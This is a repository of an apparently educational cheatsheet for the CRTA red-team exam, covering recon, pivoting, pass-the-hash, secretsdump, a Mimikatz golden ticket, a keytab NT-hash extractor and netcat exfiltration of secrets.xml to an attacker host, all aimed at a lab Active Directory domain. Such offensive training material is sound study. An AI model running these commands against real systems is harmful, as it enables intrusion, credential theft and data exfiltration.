├── README.md
├── resources.md
└── CRTA.md

/README.md:
--------------------------------------------------------------------------------
This is a cheatsheet of commands and processes to compromise an Active Directory environment. Everything documented in this repository is based on my own experience with the CRTA exam, and the context and circumstances may vary. For educational purposes only.

🔴 CRTA - Certified Red Team Analyst (Exam) 🔴

The Certified Red Team Analyst (CRTA) is a 48-hour hands-on exam simulating a real-world red team engagement inside an Active Directory environment.

You'll have:

⏱ 24 hours to perform the attack:

- Enumerate the network
- Gain access
- Pivot between hosts
- Escalate privileges
- Locate and exfiltrate the main target: secrets.xml

🕐 24 additional hours to submit your report:

- Include screenshots, command outputs, and a clear attack path
- Explain your techniques, tools, and how you achieved the objectives
- Report quality is critical: it determines pass or fail

Goal: Simulate a stealthy red team operation against AD, showing not just technical skill but also professional documentation.

--------------------------------------------------------------------------------
/resources.md:
--------------------------------------------------------------------------------
## 📚 Resources to Learn Active Directory and Master the CRTA Exam

### 1. Microsoft Official Documentation
- [Active Directory Documentation](https://learn.microsoft.com/en-us/windows-server/identity/active-directory-domain-services)
  *Comprehensive official guides on AD architecture, administration, and features.*

### 2. Hack The Box Academy (Free Courses)
- [Active Directory (Full Module)](https://academy.hackthebox.com/course/preview/active-directory)
- [Active Directory LDAP (Free)](https://academy.hackthebox.com/course/preview/active-directory-ldap)
- [Active Directory PowerView (Free)](https://academy.hackthebox.com/course/preview/active-directory-powerview)
- [Active Directory BloodHound (Free)](https://academy.hackthebox.com/course/preview/active-directory-bloodhound)
  *Hands-on modules focusing on AD enumeration and attack paths.*

### 3. TryHackMe (Free Rooms)
- [Active Directory Fundamentals](https://tryhackme.com/room/activedirectoryfundamentals)
- [BloodHound & AD Enumeration](https://tryhackme.com/room/bloodhound)
  *Interactive labs with step-by-step guides and practical exercises.*

### 4. YouTube Channels & Playlists
- **IppSec** – Excellent walkthroughs of HTB AD machines
- **John Hammond** – Tutorials on AD exploitation and post-exploitation
- **NetworkChuck** – Basics and practical AD explanations

### 5. Blog Tutorials
- [Adsecurity.org](https://adsecurity.org/?cat=7) – In-depth AD attack techniques and tutorials by Sean Metcalf
- [PentestLab](https://pentestlab.blog/category/active-directory/) – Practical AD pentesting labs and guides

### 6. Tools Documentation
- [PowerView (PowerShell AD Enumeration)](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
- [BloodHound](https://bloodhound.readthedocs.io/en/latest/)

## 🧩 Windows Active Directory Machines for CRTA Practice (Easy–Medium)

Here's a curated list of Hack The Box machines that simulate Active Directory environments. All are ranked **Easy** or **Medium**, making them ideal for CRTA preparation.

---

### 🟢 Easy

| Machine Name | Link | Focus |
|--------------|------|-------|
| 🧠 Active | [HTB – Active](https://app.hackthebox.com/machines/9) | Basic AD enumeration, password reuse, SAM database |
| 🕵️‍♂️ Escape | [HTB – Escape](https://app.hackthebox.com/machines/501) | Token impersonation, privilege abuse |
| 🧰 Escape Two | [HTB – Escape Two](https://app.hackthebox.com/machines/548) | Services abuse, lateral movement |
| 🧮 Resolute | [HTB – Resolute](https://app.hackthebox.com/machines/152) | Password reuse, enum4linux, WinRM access |

---

### 🟡 Medium

| Machine Name | Link | Focus |
|--------------|------|-------|
| 🛠 Support | [HTB – Support](https://app.hackthebox.com/machines/467) | Credential dumping, enumeration, RCE |
| 🗂 Cascade | [HTB – Cascade](https://app.hackthebox.com/machines/221) | LDAP abuse, file share traversal, escalation |
| 🧾 Manager | [HTB – Manager](https://app.hackthebox.com/machines/358) | AD CS abuse, certificate auth, escalation to Domain Admin |

---

### ✅ Recommendation

Complete them in this order for a smooth learning curve. Be sure to:
- Document each step with screenshots.
- Practice enumeration and lateral movement.
- Practice locating and exfiltrating a target file on each machine, since the CRTA objective is `secrets.xml`.

By @blindma1den

--------------------------------------------------------------------------------
/CRTA.md:
--------------------------------------------------------------------------------
## 🔴 CRTA Cheatsheet 🔴

## 🧭 Phase 1 – Initial Recon (External/Perimeter)

### Context
Initial reconnaissance focuses on identifying live hosts and open services in the target range so that the next steps can be planned with minimal noise.

### Techniques
- Ping sweep to detect live hosts (ICMP).
- Full port scan with service version detection.
- Automated recon for efficiency and clean reports.

### Commands
```bash
# Discover live hosts with a ping sweep (ICMP echo; if ICMP is filtered, add TCP probes such as -PS445,3389)
nmap -sn <target-range>

# Full TCP port scan + version detection, output to a file for the report
nmap -p- -T4 -sV -oN scan.txt <target>

# Automated recon (nmap + NSE scripts + per-service enumeration); the pipx install exposes it as `autorecon`,
# a repository checkout runs as `python3 autorecon.py`
autorecon <target>
```

## 🔓 Phase 2 – Initial Access (Exploitation)

Context: Look for exploitable vulnerabilities or misconfigurations to gain an initial foothold on target machines.

Techniques:
- Exploit known backdoors (e.g., vsftpd 2.3.4).
- Prepare listeners for reverse shells.
- Search for plaintext credentials in common file locations.

Commands:
```bash
# Check for the vsftpd 2.3.4 backdoor with the nmap NSE script (it triggers the backdoor and reports whether the shell port answered)
nmap --script ftp-vsftpd-backdoor -p 21 <target>

# Set up a listener for a reverse shell
nc -lnvp <port>

# Search for passwords in user directories
grep -ri password /home/* 2>/dev/null
```
Tools:

- nmap scripts – Automated exploit scanning.
- netcat (nc) – Listener and shell connections.

## 🔁 Phase 3 – Pivoting (Cross-Subnet Movement)

Context: Use compromised hosts to reach networks or subnets that are otherwise unreachable.

Techniques:
- Create a SOCKS5 tunnel via SSH dynamic port forwarding.
- Use proxychains to redirect tool traffic through the tunnel.

Commands:
```bash
# Establish a SOCKS5 proxy on local port 1080 through the pivot host (add -N if you do not need a shell on it)
ssh -D 1080 user@<pivot_host>

# Point proxychains at the tunnel. Add the line once (appending again stacks duplicate proxies) and comment out
# the default "socks4 127.0.0.1 9050" Tor entry, or traffic is sent to a proxy that is not running.
# Kali's proxychains4 reads /etc/proxychains4.conf; confirm which file your binary uses.
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
```
Tools:

- SSH – Dynamic port forwarding.
- proxychains – Force tools to use the SOCKS5 proxy.

## 🔍 Phase 4 – Internal Recon (Windows / AD Environment)

Context: Identify Domain Controllers and key services within the AD environment to prepare targeted attacks.

Techniques:
- Scan common DC ports (Kerberos, LDAP, SMB, GC).
- Identify admin services like WinRM and RDP.

Commands:
```bash
# Scan typical Domain Controller ports: 88 Kerberos, 389/636 LDAP/LDAPS, 445 SMB, 3268 Global Catalog.
# Through the Phase 3 tunnel run it as `proxychains nmap -sT -Pn ...`: SOCKS only carries TCP connect scans, no ping.
nmap -p 88,389,636,445,3268 <target>

# Full port and service version scan (5985/5986 WinRM and 3389 RDP are the admin services to look for)
nmap -p- -sV -T4 <target>
```
Tools:

- nmap

## 🧑‍💻 Phase 5 – Abuse Web Interfaces / Internal Panels

Context: Gain access to internal admin web panels (e.g., Webmin, Cockpit) through the tunnel and escalate privileges from the shell they provide.

Techniques:
- Access web interfaces through the proxychains tunnel.
- Escalate privileges with sudo if permitted.

Commands:
```bash
# Browse internal web services through the SOCKS tunnel. If Firefox ignores the hook (for example because an
# instance is already running), set the SOCKS5 proxy 127.0.0.1:1080 in Firefox's network settings instead.
proxychains firefox http://<internal_host>:<port>

# Privilege escalation if sudo is permitted (check what is allowed first with: sudo -l)
sudo /bin/bash
```
Tools:

- Firefox + proxychains
- sudo

## 🗝️ Phase 6 – Credential Extraction

Context: Extract credentials or hashes for lateral movement or privilege escalation.

Techniques:
- Parse Kerberos keytab files: the keys are stored in the clear, and the RC4-HMAC key of an entry is the account's NT hash, usable directly for pass-the-hash.
- Dump credentials from memory or system files.

Commands:
```bash
# Extract the keys (RC4-HMAC key = NT hash) from a .keytab file; the system keytab is usually /etc/krb5.keytab
python3 KeyTabExtract.py <file.keytab>
```
Tools:

- KeyTabExtract.py
- Mimikatz (see Phase 9)

## 📡 Phase 7 – Lateral Movement

Context: Move across the domain using obtained hashes or credentials to expand access.

Techniques:
- Use NT hashes to authenticate without the password (pass-the-hash).
- Dump stored hashes from compromised hosts.
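For Phase 6 above, this is what a keytab parser such as KeyTabExtract.py has to do, written out as an added example in Python. It is not part of this cheatsheet and not KeyTabExtract.py's own code. The keytab fed to it is constructed inside the block: the `svc_backup` and `host/dc01.redteam.corp` principals, the `REDTEAM.CORP` realm and the key bytes are assumptions (the RC4 key used is the widely published NT hash of the string `password`). Pass a real file as the first argument to parse it instead.

```python
# Added example (not from the CRTA cheatsheet or KeyTabExtract.py): parse an MIT keytab
# and pull out the RC4-HMAC key, which is the account's NT hash. Sample data is constructed.
import struct

RC4_HMAC = 23
ENCTYPES = {1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
            17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def _octets(buf, off):
    """counted_octet_string: u16 length (big-endian) followed by the bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_keytab(data):
    """Return one dict per entry of a version-2 (0x0502) MIT keytab.

    Entry layout: i32 size (negative = free slot to skip), u16 component count,
    realm, components, u32 name_type, u32 timestamp, u8 vno8, u16 enctype,
    u16 key length, key bytes, optional u32 vno32 (overrides vno8 when present and non-zero).
    """
    if data[:2] != b"\x05\x02":
        raise ValueError("not a version-2 keytab")
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                      # deleted entry: skip the hole
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _octets(data, off)
        comps = []
        for _ in range(ncomp):
            c, off = _octets(data, off)
            comps.append(c.decode())
        _name_type, timestamp, vno = struct.unpack_from(">IIB", data, off)
        off += 9
        enctype, klen = struct.unpack_from(">HH", data, off)
        off += 4
        key = data[off:off + klen]
        off += klen
        if end - off >= 4:
            (vno32,) = struct.unpack_from(">I", data, off)
            vno = vno32 or vno
        off = end
        entries.append({"principal": "/".join(comps) + "@" + realm.decode(),
                        "enctype": ENCTYPES.get(enctype, f"etype-{enctype}"),
                        "kvno": vno, "timestamp": timestamp, "key": key.hex()})
    return entries


def nt_hashes(data):
    """principal -> NT hash for every rc4-hmac entry (usable directly with crackmapexec -H)."""
    return {e["principal"]: e["key"] for e in parse_keytab(data) if e["enctype"] == "rc4-hmac"}


def build_keytab(entries):
    """Test fixture only: serialise (principal, realm, enctype, kvno, key) tuples as a keytab."""
    out = bytearray(b"\x05\x02")
    for principal, realm, enctype, kvno, key in entries:
        comps = principal.split("/")
        body = bytearray(struct.pack(">H", len(comps)))
        for s in [realm] + comps:
            b = s.encode()
            body += struct.pack(">H", len(b)) + b
        body += struct.pack(">IIB", 1, 1700000000, kvno & 0xFF)   # KRB5_NT_PRINCIPAL, timestamp, vno8
        body += struct.pack(">HH", enctype, len(key)) + key
        body += struct.pack(">I", kvno)                            # vno32
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


# Constructed sample: one rc4-hmac entry (key = NT hash of "password", a well-known value) and one
# aes256 entry, with a 6-byte deleted slot in front of them as real keytabs often contain.
SAMPLE_KEYTAB = build_keytab([
    ("svc_backup", "REDTEAM.CORP", RC4_HMAC, 2, bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")),
    ("host/dc01.redteam.corp", "REDTEAM.CORP", 18, 3, b"\x11" * 32),
])
SAMPLE_KEYTAB = SAMPLE_KEYTAB[:2] + struct.pack(">i", -6) + b"\x00" * 6 + SAMPLE_KEYTAB[2:]

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(data):
        print(f'{e["principal"]:40} kvno={e["kvno"]} {e["enctype"]:24} {e["key"]}')
```

The AES entries are real keys too, but they are derived with PBKDF2 from the password and the salt, so they are not NT hashes and cannot be replayed over NTLM; they can still be used for Kerberos authentication with tools that accept an AES key. The rc4-hmac key is the one you feed to `crackmapexec -H`.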

Commands:
```bash
# Validate SMB access with an NT hash (pass-the-hash); "Pwn3d!" in the output means local admin on that host
crackmapexec smb <target> -u <user> -H <nt_hash>

# Dump SAM/LSA secrets from a host with Impacket; against a DC add -just-dc to pull every NTDS.DIT hash
secretsdump.py <domain>/<user>@<target> -hashes :<nt_hash>
```
Tools:

- crackmapexec (its maintained successor NetExec, `nxc`, uses the same syntax)
- secretsdump.py (Impacket)

## 🧬 Phase 8 – Advanced Pivoting with Ligolo-ng

Context: Create VPN-like tunnels (a TUN interface on the attacker side, a reverse connection from the victim) for persistent pivoting and routing into segmented networks.

Techniques:
- Run the Ligolo proxy on the attacker machine.
- Execute the Ligolo agent on the victim so it connects back.
- Add routes to reach internal networks via the tunnel.

Commands:
```bash
# Attacker: create the TUN interface the tunnel will use (once per boot)
sudo ip tuntap add user "$USER" mode tun ligolo
sudo ip link set ligolo up

# Start the Ligolo proxy server (listens on 11601 by default with a self-signed certificate)
./proxy -selfcert

# Victim (Windows): run the Ligolo agent so it connects back to the attacker
agent.exe -connect <attacker_ip>:11601 -ignore-cert

# In the proxy console, pick the agent with `session` and run `start`; then route the internal subnet through the tunnel
sudo ip route add <internal_subnet>/<prefix> dev ligolo
```
Tools:

- Ligolo-ng

## 🎫 Phase 9 – Golden Ticket Attack (Persistence + Domain Admin)

Context: Forge a Kerberos TGT signed with the krbtgt key so Domain Admin access survives until that key is rotated (twice, since the previous key stays valid).

Techniques:
- Clear current tickets to avoid conflicts.
- Use Mimikatz to create the forged Golden Ticket.

Commands:
```powershell
# Purge existing Kerberos tickets
klist purge

# In Mimikatz (privilege::debug, running as SYSTEM on the DC). lsadump::trust /patch dumps the inter-realm trust keys;
# the krbtgt NT hash for /krbtgt: comes from lsadump::lsa /patch /name:krbtgt (or lsadump::dcsync /user:krbtgt), and the
# domain SID (whoami /user, minus the trailing RID) goes in /sid:. Add /ptt to inject the ticket directly; without it the
# ticket is written to ticket.kirbi and must be loaded with kerberos::ptt.
lsadump::trust /patch
kerberos::golden /user:child-admin /domain:redteam.corp /sid:<domain_SID> /krbtgt:<krbtgt_NT_hash>
```
Tools:

- Mimikatz

## 📤 Phase 10 – Data Exfiltration

Context: Find and transfer sensitive files out of the target environment.

Techniques:
- Search for files containing secrets.
- Use netcat for a quick file transfer (a raw plaintext TCP stream: simple, not stealthy; fine in the lab, but say so in the report).

Commands:
```bash
# Find files with sensitive keywords on a Linux host
find / -type f -iname "*secret*.xml" 2>/dev/null

# Same search on a Windows host (PowerShell)
Get-ChildItem -Path C:\ -Recurse -Filter "*secret*.xml" -ErrorAction SilentlyContinue

# Listen on the attacker for the incoming file
nc -l -p 1235 > secrets.xml

# Send the file from the victim (Windows command line; needs an nc.exe or ncat.exe on the host)
type C:\path\secrets.xml | nc <attacker_ip> 1235
```
Tools:

- netcat

## 🧠 Summary: Mastering the Active Directory Red Team Engagement

This cheat sheet is a practical guide to performing a full-scope red team operation against an Active Directory environment. Each phase builds on the previous one, and success comes not just from knowing commands but from understanding the context and adapting to the target network.

---

### 🧭 Key Phases Overview

| Phase | Goal |
|-------|------|
| Phase 1 | Initial Recon: Identify hosts and services externally |
| Phase 2 | Initial Access: Exploit vulnerabilities or misconfigs |
| Phase 3 | Pivoting: Reach internal subnets through tunnels |
| Phase 4 | Internal Recon: Map the AD environment |
| Phase 5 | Abuse Internal Panels: Access internal admin UIs |
| Phase 6 | Credential Extraction: Extract hashes and passwords |
| Phase 7 | Lateral Movement: Expand control across machines |
| Phase 8 | Advanced Pivoting: Use Ligolo for robust tunneling |
| Phase 9 | Golden Ticket: Achieve persistent Domain Admin access |
| Phase 10 | Exfiltration: Locate and extract the target data |

---

## 🛠️ Advice and Best Practices

### 🧠 Think Like an Attacker
Don't just memorize commands; ask *why* each one is used. Understand the purpose behind every technique so you can adapt to different environments.

### 🧪 Practice in Labs
Set up a lab with real Windows machines and an Active Directory domain.
Use platforms like:
- [HackTheBox](https://www.hackthebox.com)
- [TryHackMe](https://tryhackme.com)
- Your own virtual lab (e.g., AD + Kali on VirtualBox or Proxmox)

### 📸 Document Everything
In real engagements and exams like CRTA, you must:
- Take **screenshots** of every relevant step.
- Keep terminal output logs and timestamps.
- Explain *what* you did and *why*.
- Create a clear **report** showing the full attack path.

> 🎯 **Exam Tip:** The goal is often to extract the file `secrets.xml` or similar sensitive artifacts. Build your process around finding and exfiltrating that final objective.

### 📚 Learn the Tools
Spend time learning how each tool works under the hood:
- `nmap` and its scripts
- `proxychains` and tunneling techniques
- `crackmapexec`, `impacket`, `mimikatz`
- `Ligolo-ng`, `netcat`, `autorecon`

### 📋 Take Notes
During exams or engagements, keep notes of:
- IPs, ports, usernames, hashes
- Tools used and exact command syntax
- Timeline of actions (this helps in reports)

### 🚨 Stay Quiet
Avoid noisy scans: scan the ports you actually need before falling back to `-p-`, use slower `nmap` timing such as `-T2` where the 24-hour window allows it, avoid spraying default usernames, and test tools in low-noise ways first.

### 🔒 Clean Up
After engagements or tests, remove any artifacts (listeners, dropped files, agents and tunnels, forged tickets). Don't leave traces.

---

## ✅ Final Tip

🔁 **Repetition and real-world simulation are key.** Go through this cheat sheet repeatedly until every phase becomes second nature. The more you internalize the *why* and *how*, the better you'll perform in actual red team scenarios or exams like CRTA.

Happy hacking! ⚔️

By: @blindma1den

--------------------------------------------------------------------------------